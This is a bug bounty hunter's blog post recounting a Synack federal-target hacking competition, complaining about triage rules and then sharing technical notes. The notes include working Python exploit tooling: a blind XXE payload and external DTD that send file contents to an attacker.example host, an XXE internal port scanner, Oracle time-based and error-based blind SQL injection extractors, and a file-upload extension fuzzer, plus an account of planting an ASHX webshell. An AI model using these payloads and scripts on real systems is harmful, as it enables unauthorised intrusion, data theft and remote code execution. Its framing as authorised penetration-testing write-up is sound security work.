

Preface

Obligatory statement: This blog post is in no way affiliated with, sponsored by, or endorsed by Synack, Inc. All graphics are displayed under fair use for the purposes of this article.

Over the last few months, Synack has been running a user-engagement-based competition called Red vs Fed. As the name suggests, the competition focused on penetration testing Synack’s federal customers. For those of you unfamiliar with Synack, it is a crowd-sourced hacking platform with a bug bounty style payment system. Hackers (consultants) are recruited from all over the planet to perform penetration testing services through Synack’s VPN-based platform. Some of the key differentiators Synack markets relative to other bounty platforms are a defined payout schedule based on vulnerability type and a 48-hour triage time.

Red Vs Fed

This section is a general overview of my experience participating in my first hacking competition with Synack, Red Vs Fed. At times it may come off as a diatribe, so feel free to jump ahead to the technical notes that follow. For any of this to make sense, we first have to start with the competition rules and scoring. Points were awarded per “accepted” vulnerability based on the CVSS score, as determined by Synack on a scale of 1-10. Additional multipliers were also applied once you passed a certain number of accepted bugs. The important detail here is the word “accepted”, which means a bug has to survive the myriad of exceptions, loopholes, and flat-out dismissals as it goes through the Synack triage process. The information behind all of these “rules” is scattered across various help pages accessible to red team members. Examples of some of these written, unwritten, and observed rules, which will be referenced by number in this section:

1. Shared code: If a report falls within any of roughly 10 different permutations of what might be considered shared code or the same root issue, it will be accepted at a substantially discounted payout or forced to be combined into a single report.

2. 24 hour rule: During the first 24 hours of a new listing, duplicate reports are compared by triage staff, who choose the report they feel has the highest “quality”. This is by far the most controversial and abused “feature”, as it has led to report stuffing, favoritism, and even rewards given after clear violations of the Rules of Engagement.

3. Customer rejected: Even though vulnerability acceptance and triage are marketed as being performed internally by Synack experts within 48 hours, some reports are seemingly at random sent to the customer to decide whether they should be rejected.

4. Low Impact: Depending on the listing type, the age of the listing, or the individual triage staff member, some bugs will be marked as low impact and rejected. This rule applies to bug types that seem to be accepted somewhat randomly on some targets, even though they all fall into the low impact category.

5. Dynamic Out-of-Scope: Bug types, domains, and entire targets can be taken out of scope abruptly depending on report volume. There are loopholes to this rule if you happen to find load balancers or CNAME records for the same target domains.

6. Target Analytics: This is a feature, not a rule, but it seemed fitting for this list. When a vulnerability is accepted by Synack on a target, details like the bug type and location are released to everyone currently enrolled on the target.



About a month into the competition, I was performing some rudimentary endpoint discovery (dirsearch, Burp Intruder) on one of the legacy competition targets and had a breakthrough. I got a hit on a new virtual host on a server in the target scope, i.e., a new web application. When I come across a new application, one of the first things I do is tune my wordlist for the next round of endpoint enumeration. I do this using endpoints defined in the page source and included JavaScript files, and by identifying common naming patterns, e.g., prefix_word_suffix.ext. On the next round of enumeration I hit the error page below.
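A minimal sketch of that wordlist-tuning step follows. It assumes the page source and JavaScript have already been saved as text. The regex, the token splitting, and the prefix/suffix/extension lists are illustrative assumptions, not the exact process used during the competition.

```python
import itertools
import re

# Rough pattern for quoted, path-like strings in HTML/JS (an assumption; tune per target)
PATH_RE = re.compile(r"""["'](/[A-Za-z0-9_\-./]+)["']""")


def harvest_paths(text):
    """Return unique path-like strings quoted in page source or JavaScript."""
    return sorted(set(PATH_RE.findall(text)))


def harvest_tokens(paths):
    """Split paths into word tokens, e.g. /admin/get_user_list.aspx -> admin, get, user, list."""
    tokens = set()
    for p in paths:
        stem = p.rsplit(".", 1)[0]  # drop the file extension, if any
        tokens.update(t.lower() for t in re.split(r"[/_\-.]+", stem) if t)
    return tokens


def permute(words, prefixes, suffixes, exts):
    """Generate candidates shaped like prefix_word_suffix.ext (empty parts are skipped)."""
    out = set()
    for w, pre, suf, ext in itertools.product(sorted(words), prefixes, suffixes, exts):
        parts = [x for x in (pre, w, suf) if x]
        out.add("_".join(parts) + ext)
    return sorted(out)
```

For example, `permute(["user"], ["", "get"], ["", "list"], [".aspx"])` yields `get_user.aspx`, `get_user_list.aspx`, `user.aspx`, and `user_list.aspx`. Feeding harvested tokens back through `permute` keeps the next enumeration round aligned with the application's own naming scheme.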

A bug hunter can’t ask for an easier SQL injection vulnerability: verbose error messages, plus the actual SQL query with database names, table names, and column names. I whipped up a POC (discussed further down) and started putting together a report for the bug. After a little more recon, I was able to uncover and report a handful of additional SQLi vulns over the next couple of days. While continuing to discover and “prove” SQLi on more endpoints, I was first introduced to (5) when the entire domain was taken out of scope for SQLi. No worries, at least my bugs were submitted, so no one else should be able to swoop in and clean up my leftovers. Well, not exactly. It just so happened that there was a load balancer in front of my target as well as a defined CNAME (alias) for my domain. Thanks to (6), another competitor saw my bugs, knew about this loophole, and was able to submit an additional 5 SQLi on the aliased domain before another dynamic OOS was issued.

At this point, the race was on to report as many vulnerabilities as possible on this new web application, since my discovery was now public to the rest of the competitors via analytics. I managed to get in a pretty wide range of vulnerabilities on the target, but they were fairly evenly split with the competitor who was already in second place, putting him into first. With this web application pretty well picked through, I began looking for additional vhosts on new subdomains in hopes of finding similarly vulnerable applications. Given my last outcome, I also began to strategize about how best to time and group my submissions, realizing these nuances could be the difference between other competitors scooping them up, Synack taking them out of scope, or reports being forced to be combined.

A couple of weeks later I caught a lucky break. I came across a couple more web applications on a different subdomain that appeared to use the same web technologies as my previous find, and hopefully similarly buggy code. As I started enumerating the targets, the bugs started stacking up. This time I took a different approach. Knowing that as soon as my reports hit analytics it would be a feeding frenzy amongst the other competitors, I began queuing up reports without submitting them. Once I had exhausted all the bugs I could find, I submitted the reports in chunks. I sized each chunk just under what I guessed Synack’s tolerance was before taking the vulnerability class OOS, and submitted them in windows short enough that, hopefully, other competitors couldn’t beat me to submission by watching analytics. Thankfully, I was able to slip in all of the reports just before Synack took the entire parent domain OOS.

Back to the grind… After the last barrage of vulnerability submissions I had managed to get dozens of websites taken out of scope, so I had to set my sights on a new target. Luckily, I had managed to position myself in first place after all of the reports had been triaged.

Nothing new here: lots of recon and endpoint enumeration. I began brute-forcing vhosts on domains that had been shown to host multiple web applications in an attempt to find new ones. After some time I stumbled across a new web application on a new vhost. Its functionality appeared to be broken out into 3 distinct groupings. As with my previous finds, I came across various bug types related to access control issues, PII disclosure, and unauthorized data modification. I followed my last approach and lined up submissions until I had finished assessing the web application. I then began to stagger the submissions based on the groupings I had identified.
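Virtual host brute-forcing, as mentioned above, usually comes down to sending requests to the same server with different Host headers and flagging responses that differ from a baseline for a hostname that should not exist. The sketch below shows that idea. The IP, domain, wordlist, and the "status or size differs" heuristic are all assumptions. Because it connects by IP, no hostname is sent via TLS SNI, so servers that route on SNI need a different approach.

```python
import http.client
import ssl


def fetch(ip, host, use_tls=False, port=None, timeout=10):
    """GET / from `ip` with a custom Host header; return (status, body_length)."""
    if use_tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False  # connecting by IP on purpose
        ctx.verify_mode = ssl.CERT_NONE
        conn = http.client.HTTPSConnection(ip, port or 443, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(ip, port or 80, timeout=timeout)
    try:
        conn.request("GET", "/", headers={"Host": host})
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    finally:
        conn.close()


def is_interesting(result, baseline, tolerance=50):
    """Flag responses whose status or size differs from the bogus-host baseline."""
    status, length = result
    base_status, base_length = baseline
    return status != base_status or abs(length - base_length) > tolerance


def brute_vhosts(ip, domain, words, **kw):
    """Try word.domain for each word; return hosts that differ from the baseline."""
    baseline = fetch(ip, "does-not-exist-12345." + domain, **kw)
    hits = []
    for w in words:
        host = f"{w}.{domain}"
        try:
            result = fetch(ip, host, **kw)
        except (OSError, http.client.HTTPException):
            continue  # timeouts/resets: skip the word rather than abort the run
        if is_interesting(result, baseline):
            hits.append((host, result))
    return hits
```

The size tolerance matters in practice. Default pages that echo the requested hostname vary by a few bytes, and a strict equality check would flag every word.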

Unfortunately, things didn’t go as well this time. The triage time started dragging on and I got nervous I wouldn’t be able to get all of my reports in before the target was put out of scope, so I decided to go ahead and submit everything. This was a mistake. When the second group of reports hit, the triage team decided that all 6 of the reports stemmed from one access control issue. They accepted a couple as (1) shared code for a 10% payout, then pushed back a couple more to be combined into one report. I pleaded my case to more than one member of the triage team but was overruled. When all was said and done, they had distilled dozens of vulnerabilities across over 20 endpoints into 2 reports that would count towards the competition, and then put the domain OOS (5). Oh well… I was already in first, so I probably shouldn’t make a big stink, right?

Over the next month, it seemed I was introduced to pretty much every way a report could be rejected short of a clear CVSS 10. (This is obviously an exaggeration, but the bug types below are regularly accepted on the platform.)

1. User account state modification (Self Activation/Auth Bypass, Arbitrary Account Lockout) – initially rejected, appealed it and got it accepted

2. PII Disclosure – Rejected as (3), with the customer claiming it as won’t fix

3. User Login Enumeration on a target with a NIST SP 800-53 requirement – Rejected as (3) and (4), even though an email submission CAPTCHA bypass was accepted on the same target… Really???

4. phpinfo() page – Rejected as (4), even though these are occasionally accepted on web targets



5. Auth Bypass/Access Control issue – An endpoint behind a site’s login portal allowed live viewing of CC feeds – Rejected as (4) with the following explanation:



6. Unauthenticated, on-demand reboot of a network protection device – Rejected as (3), even though the exact same vulnerability had been accepted on a previous listing literally 2 days prior, with points awarded toward the competition. My dialog with the organizer about the issue is below:

At this point it really started to feel like I was fighting an unwinnable battle against the Synack triage team. Six of my last 8 submissions had been rejected for one reason or another, and the other 2 I had to fight for. Luckily, the competition would be over shortly, and very few viable targets remained eligible for it. With 2 days remaining in the competition, I was still winning by a couple of bugs.

I wish I could say everything ended uneventfully 2 days later, but what good Synack sob story doesn’t talk about the infamous 24 hour rule (2)? To make things interesting, a web target was released roughly 2 days before the end of the competition. I mention “web” because the bar for “low impact” (4) bugs is typically lower for these assessment types, which means it could really shake up the scoreboard. Well, here we go…

I approached the last target like a CTF: only 48 more hours to hopefully secure the win. Ironically, the last target had a bit of a CTF feel to it. After navigating the application a little, it became obvious that the target was a test environment that had already undergone similar pentests. It was littered with persistent XSS payloads that had been dropped over a year earlier. These “former” bugs served as red herrings, as the application was no longer vulnerable to them even though the payloads persisted. I presume they also served as a time sink for many, since under the 24 hour rule (2) any red teamer could win the bug if their report was deemed the “best” submission. Unfortunately, only a few hours into the test the target became very unstable. The server didn’t go down, but it became nearly impossible to log in to, regularly returning an unavailable message as if it were being DoSed. Rather than continue to fight with it, I hit the sack hoping it would be up in the morning.



First thing in the morning I was back on it. With only 12 hours left in the 24 hour rule (or so I thought), I needed to get some bugs submitted. I came across an arbitrary file upload with a preview function that looked buggy.



The file preview endpoint took parameters that specified the filename and MIME type. Modifying these parameters changed the response’s Content-Type and Content-Disposition headers (the latter controls whether the response is displayed inline or downloaded).
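The reasoning here is that a preview endpoint that lets the caller pick both the MIME type and the disposition can serve an uploaded HTML or SVG file inline, which turns the upload into persistent XSS. A sketch of how such an endpoint might be probed follows. The URL and the `id`, `filename`, and `mimetype` parameter names are hypothetical, because the real ones are not given here.

```python
import urllib.parse
import urllib.request

# Hypothetical endpoint and parameter names; the real ones are not shown in the post
PREVIEW_URL = "https://target.example/preview"


def preview_headers(file_id, filename, mimetype, timeout=10):
    """Request a preview and return (Content-Type, Content-Disposition)."""
    qs = urllib.parse.urlencode({"id": file_id, "filename": filename, "mimetype": mimetype})
    with urllib.request.urlopen(f"{PREVIEW_URL}?{qs}", timeout=timeout) as resp:
        return resp.headers.get("Content-Type", ""), resp.headers.get("Content-Disposition", "")


def renders_inline_html(content_type, disposition):
    """True if a browser would likely render the response as active content in-page."""
    ctype = content_type.split(";")[0].strip().lower()
    inline = not disposition or disposition.strip().lower().startswith("inline")
    return ctype in ("text/html", "image/svg+xml") and inline
```

In use, you would loop `preview_headers` over a few candidate MIME types and filenames for an uploaded file containing a harmless script marker. Any combination for which `renders_inline_html` returns True is worth confirming manually in a browser.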

I got the vulnerability written up and submitted before the end of the 24 hour rule. Since persistent XSS has a higher payout and a higher CVSS score on Synack, I chose this vulnerability type rather than arbitrary file upload. Several hours after my submission, an announcement was made that, due to the application’s unavailability the previous night (a possible DoS), the 24 hour rule would be extended by 12 hours. Well that sux… it meant I would now be competing with more, and possibly better-quality, reports for the bug I had just submitted. Time to go look for more bugs and hopefully balance it out.



After some more trolling around, I found an endpoint that imported records into a database using a custom XML format. Features like this are prime candidates for XXE vulnerabilities. After some testing I found it was indeed vulnerable to blind XXE. XXE bugs are very interesting because of the various exploit primitives they can provide. Depending on the XML parser implementation, the application configuration, the system platform, and network connectivity, these bugs can be used for arbitrary file read, SSRF, and even RCE. XXEs are most effectively exploited when you have the XML specification for the object being parsed. Unfortunately for me, the documentation for the XML file format I was attacking was behind an out-of-scope login page. I admit I probably spent too much time on this bug, as the red teamer in me wanted RCE. I could get the parser to download my DTD file and open files, but I couldn’t get it to leak the data.
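For context, the textbook way to leak data through blind XXE is out-of-band exfiltration. The request body pulls in an attacker-hosted DTD, and that DTD reads a file into a parameter entity and embeds it in a callback URL. The sketch below generates both pieces. The attacker host, the root element name, and the target file are assumptions. Leaks like this often fail when the file contains characters that break the callback URL or the XML (newlines, `&`, `%`), which is one common reason a DTD gets fetched but nothing comes back.

```python
# Hypothetical attacker-controlled host that serves the DTD and receives callbacks
ATTACKER = "http://attacker.example:8000"


def xxe_payload(root="records"):
    """XML body that loads the external DTD; the root element name is an assumption."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root} [<!ENTITY % ext SYSTEM "{ATTACKER}/evil.dtd"> %ext;]>\n'
        f"<{root}></{root}>"
    )


def evil_dtd(path="/etc/hostname"):
    """External DTD: read `path`, then send its contents out in a callback URL."""
    # &#x25; is an escaped '%', so the exfil entity is only declared when %eval; expands.
    # This nesting must live in an external DTD; the internal subset forbids it.
    return (
        f'<!ENTITY % file SYSTEM "file://{path}">\n'
        f"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '{ATTACKER}/?d=%file;'>\">\n"
        "%eval;\n%exfil;\n"
    )
```

To try it, save `evil_dtd()` as `evil.dtd`, serve it with `python3 -m http.server 8000`, and submit `xxe_payload()` to the import endpoint. A successful leak shows up in the server’s access log as a request for `/?d=...`.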



Since I couldn’t get LFI working, I used the XXE to perform a port scan of the internal server so I could at least submit the bug as SSRF. I plugged the payload into Burp Intruder and set it on its way to enumerate all the open ports.
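The same port scan can be scripted outside Burp Intruder, with the port as the only variable in the entity’s SYSTEM URL. This is a sketch that assumes a hypothetical import URL, an `application/xml` content type, and a guessed root element. It also assumes that open, closed, and filtered ports produce distinguishable status codes, error text, or timing, which depends entirely on the parser and network.

```python
import time
import urllib.error
import urllib.request

IMPORT_URL = "https://target.example/import"  # hypothetical import endpoint


def port_probe_xml(port, host="127.0.0.1", root="records"):
    """XXE body whose external parameter entity points at an internal host:port."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root} [<!ENTITY % probe SYSTEM "http://{host}:{port}/"> %probe;]>\n'
        f"<{root}></{root}>"
    )


def probe(port, timeout=15):
    """Send one probe; return (port, HTTP status, elapsed seconds, first 200 bytes)."""
    req = urllib.request.Request(
        IMPORT_URL,
        data=port_probe_xml(port).encode(),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read(200)
    except urllib.error.HTTPError as err:  # parser errors often surface as 4xx/5xx
        status, body = err.code, err.read(200)
    except OSError:  # client-side timeout or connection failure
        status, body = None, b""
    return port, status, time.monotonic() - start, body
```

Running `probe` over a port range and sorting the results by status, elapsed time, or error text usually makes the outliers (the open ports) stand out, much like sorting Intruder’s results columns.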

After I got the SSRF report written up, I held off on submitting it in hopes of getting the arbitrary file read (LFI) working and maybe pulling off remote code execution. Unfortunately, about this time the server started to get unstable again. For the second night in a row it appeared as if someone was DoSing the target, and it swung between crawling and unavailable. Again I decided to go to bed in hopes that by morning it would be usable.

Bright and early I got back to it: only 18 hours left in the competition, and the target was up, albeit slow. I spent a couple more hours on my XXE with no real progress. I decided to go ahead and submit before the extended 24 hour rule expired, again hoping to at least have a chance at a possible “best” report award. Unsurprisingly, a couple of hours later the 24 hour rule was extended again (because of the DoS), now ending shortly before the end of the competition. With this announcement, I decided I was done. While the reason behind the extension made sense, it could effectively put the results of the competition in the hands of the triage team, as they arbitrarily chose the best reports for any duplicated submissions.



The competition ended and we awaited the results. Based on analytics and my report numbers, I determined that the bug submission count on the new target was pretty low. As the results started to roll in, this theory was confirmed. There were roughly 8 reports after accounting for combined endpoints. My XXE was awarded as a unique finding, and my persistent XSS got duped under the 24 hour rule that had been extended to 48 hours. Shocking, extra time leads to better reports. Based on the scoreboard, the person in second must have scored every other bug on the board except 1, largely all reflected XSS. For those familiar with Synack, this would actually be quite a feat, because XSS is typically the most duped bug on the platform, meaning they likely won best report on several other collisions. I’d like to say good game, but it certainly didn’t feel like one.

Technical Notes of Interest

The techniques used to discover and exploit most of the vulnerabilities I found are not new. That said, I did learn a few new tricks and wrote a couple new scripts that seemed worth sharing.


SQL Injection

SQL injection bugs were my most prevalent find in the competition. Unlike other bug bounty platforms, Synack typically requires full exploitation of a vulnerability for full payout. With SQL injection, database names, tables, columns, and table dumps are typically requested to “prove” exploitation, rather than basic injection tests or SQL errors. While I was able to get some easy wins with sqlmap on several of the endpoints, some of the more complex queries required custom scripts to dump data from the databases. This necessity produced two new POCs, which I describe below.

In my experience, a large percentage of modern SQL injection bugs are blind. By blind, I mean SQLi bugs that cannot return data from the database in the response. That said, there are also different kinds of blind SQLi: bugs that return error messages and those that do not (completely blind). The first POC is an example of an HTTP GET, time-based boolean exploit for a completely blind SQL injection vulnerability on an Oracle database. The main difference between this POC and previous examples in my GitHub repository is the following SQL query.


The returned table has two columns of type string, and the query performs a boolean test against a supplied character limit; if the test passes, the database sleeps for a specified timeout. The response time is then measured to determine the result of the boolean test.
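A minimal sketch of this kind of Oracle time-based boolean check follows. It is not the query from the original POC. It assumes a string-context injection in a GET parameter and that the database user may call `DBMS_PIPE.RECEIVE_MESSAGE`, which is commonly used as an in-query sleep because `DBMS_LOCK.SLEEP` is a procedure and cannot be called from SQL. The payload prefix and suffix are assumptions that depend on the injection context.

```python
import time
import urllib.error
import urllib.parse
import urllib.request


def time_payload(subquery, pos, n, delay=5):
    """Sleep `delay` seconds only if ASCII(char `pos` of subquery's result) > n."""
    # Assumed string context: close the quote, inject the CASE, comment out the rest.
    # RECEIVE_MESSAGE returns 1 on timeout, so the row matches either way; only timing differs.
    return (
        f"' AND 1=(CASE WHEN ASCII(SUBSTR(({subquery}),{pos},1))>{n} "
        f"THEN DBMS_PIPE.RECEIVE_MESSAGE('x',{delay}) ELSE 1 END)--"
    )


def time_oracle(url, param, subquery, delay=5, timeout=30):
    """Return an oracle(pos, n) -> bool that decides by response time."""
    def oracle(pos, n):
        qs = urllib.parse.urlencode({param: time_payload(subquery, pos, n, delay)})
        start = time.monotonic()
        try:
            with urllib.request.urlopen(f"{url}?{qs}", timeout=timeout) as resp:
                resp.read()
        except urllib.error.HTTPError:
            pass  # an error page still tells us how long the query took
        return time.monotonic() - start >= delay * 0.8
    return oracle
```

The threshold is deliberately a little below `delay` to absorb jitter. If the condition is evaluated once per row, the delay multiplies, which still reads as True.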

The second POC is an example of an HTTP GET, error-based boolean exploit for a partially blind SQL injection vulnerability on an Oracle database. This POC targets a vulnerability that can be forced to produce two different error messages.
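An error-based boolean oracle has the same shape as a timing oracle: a CASE expression picks one of two branches, and each branch fails with a distinct, recognizable Oracle error. The sketch below uses divide-by-zero (ORA-01476) for True and invalid number (ORA-01722) for False. This pairing is an assumption for illustration and is not the POC’s actual payload, which involved `UTL_INADDR.get_host_name`. It relies on Oracle evaluating CASE branches lazily, so both errors should be verified by hand before trusting the oracle.

```python
import urllib.error
import urllib.parse
import urllib.request

TRUE_ERR, FALSE_ERR = "ORA-01476", "ORA-01722"  # divisor is zero / invalid number


def error_payload(subquery, pos, n):
    """Raise ORA-01476 if ASCII(char `pos`) > n, otherwise ORA-01722 (assumed string context)."""
    return (
        f"' AND 1=(CASE WHEN ASCII(SUBSTR(({subquery}),{pos},1))>{n} "
        "THEN 1/0 ELSE TO_NUMBER('x') END)--"
    )


def classify(body):
    """Map a response body to True/False, or None if neither error appears."""
    if TRUE_ERR in body:
        return True
    if FALSE_ERR in body:
        return False
    return None


def error_oracle(url, param, subquery, timeout=30):
    """Return an oracle(pos, n) -> bool that decides by which ORA- error is reflected."""
    def oracle(pos, n):
        qs = urllib.parse.urlencode({param: error_payload(subquery, pos, n)})
        try:
            with urllib.request.urlopen(f"{url}?{qs}", timeout=timeout) as resp:
                body = resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:
            body = err.read().decode(errors="replace")
        result = classify(body)
        if result is None:
            raise RuntimeError("no recognizable ORA- error in response")
        return result
    return oracle
```

Past the end of the string, `ASCII(SUBSTR(...))` is NULL, the WHEN condition is not true, and the ELSE branch fires. That reads as False, which gives a clean end-of-string signal.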


The error message used for the boolean test is forced by the payload in the event that the “UTL_INADDR.get_host_name” function is disabled on the target system. Both POCs extract strings from the database one character at a time using the binary search algorithm below.
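A sketch of such a per-character binary search follows. It assumes a boolean `oracle(pos, n)` that answers “is the ASCII code of the character at 1-based position `pos` greater than `n`?”; this interface is hypothetical, and either a timing check or an error check can sit behind it. Searching the printable range 32-126 takes about 7 requests per character, plus one end-of-string check, compared with up to 95 for a linear scan.

```python
def extract_char(oracle, pos, lo=32, hi=126):
    """Binary-search the character at 1-based `pos`; None means past the end."""
    # ASCII(SUBSTR(s, pos, 1)) is NULL past the end of the string, so "> lo-1" is false there
    if not oracle(pos, lo - 1):
        return None
    while lo < hi:  # invariant: the character code lies in [lo, hi]
        mid = (lo + hi) // 2
        if oracle(pos, mid):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_string(oracle, max_len=256):
    """Pull characters until the oracle reports end-of-string or max_len is reached."""
    chars = []
    for pos in range(1, max_len + 1):
        c = extract_char(oracle, pos)
        if c is None:
            break
        chars.append(c)
    return "".join(chars)


# Offline check with a fake oracle standing in for the database:
secret = "APP_SCHEMA"


def fake_oracle(pos, n):
    return pos <= len(secret) and ord(secret[pos - 1]) > n


print(extract_string(fake_oracle))  # APP_SCHEMA
```

Characters outside 32-126 are not handled. Control characters read as end-of-string, and codes above 126 collapse to `~`. Widen `lo`/`hi` if the data may contain them.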



Remote Code Execution (Unrestricted File Upload)





Probably one of the more interesting of my findings was a file extension blacklist bypass on a file upload endpoint. This particular endpoint was on a ColdFusion server and appeared to have no allowedExtensions defined, as I could upload almost any file type. I say almost because a small subset of extensions was blocked with the following error.

Further research showed that uploading arbitrary file types had been allowed until recently, when someone reported it as a vulnerability and it was assigned CVE-2019-7816. The patch released by Adobe created a blacklist of dangerous file extensions that can no longer be uploaded using cffile upload.



This got me thinking: where there is a blacklist, there is the possibility of a bypass. I googled around for a large file extension list and loaded it into Burp Intruder. After burning through the list, I reviewed the results and saw a 500 error on the “.ashx” extension with a message indicating that the content of my file was being executed. A little googling later, I replaced my file with this simple ASHX webshell from the internet and passed it a command. Bingo.
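The Intruder run described above amounts to uploading the same small file under each candidate extension and looking for responses that stand out. Here is a standard-library sketch of that loop. The upload URL and the `file` form field name are hypothetical. Depending on the application, the interesting signal (such as a 500 error showing server-side execution) may appear when requesting the uploaded file rather than in the upload response.

```python
import uuid
import urllib.error
import urllib.request

UPLOAD_URL = "https://target.example/upload.cfm"  # hypothetical endpoint
FIELD = "file"  # hypothetical form field name


def multipart_body(field, filename, content, boundary):
    """Build a minimal multipart/form-data body containing a single file part."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    return head + content + f"\r\n--{boundary}--\r\n".encode()


def try_extension(ext, content=b"probe", timeout=15):
    """Upload probe.<ext>; return (ext, status, first 200 bytes of the response)."""
    boundary = uuid.uuid4().hex
    req = urllib.request.Request(
        UPLOAD_URL,
        data=multipart_body(FIELD, f"probe.{ext}", content, boundary),
        headers={"Content-Type": f"multipart/form-data; boundary={boundary}"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return ext, resp.status, resp.read(200)
    except urllib.error.HTTPError as err:
        return ext, err.code, err.read(200)
```

Iterating `try_extension` over a large extension list and grouping the results by status and response snippet separates “blocked”, “accepted”, and “something unusual happened” much as sorting Intruder’s columns does.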

Wrap Up

Overall, the competition proved to be a rewarding experience, both financially and academically. It also felt good knowing that each vulnerability found was one less that could be used to attack US federal agencies. My main criticism of the competition is that winning became more about exploiting the platform, its policies, and its people than about finding vulnerabilities. In CTFs this isn’t particularly unusual for newer contests, which seem to forget (or not care) about the “meta” surrounding the competition itself. Hopefully, in future competitions, some of the nuanced issues surrounding vulnerability acceptance and payout can be decoupled from the competition scoring. My total tally of vulnerabilities against federal targets is displayed below.

| Bug Type | Count | CVSS (Competition Metric) |
|---|---|---|
| SQL Injection | 12 | 10 |
| Access Control | 8 | 5-9 |
| Remote Code Execution | 6 | 10 |
| Persistent XSS | 5 | 9 |
| Authentication Bypass | 2 | 8-9 |
| Local File Include | 2 | 8 |
| Path Traversal | 1 | 8 |
| XXE | 1 | 5 |
| Rejected/Combined/Duped | 16 | 0 |

On June 8th it was announced that I had taken 2nd place in the competition and won $15,000 in prize money.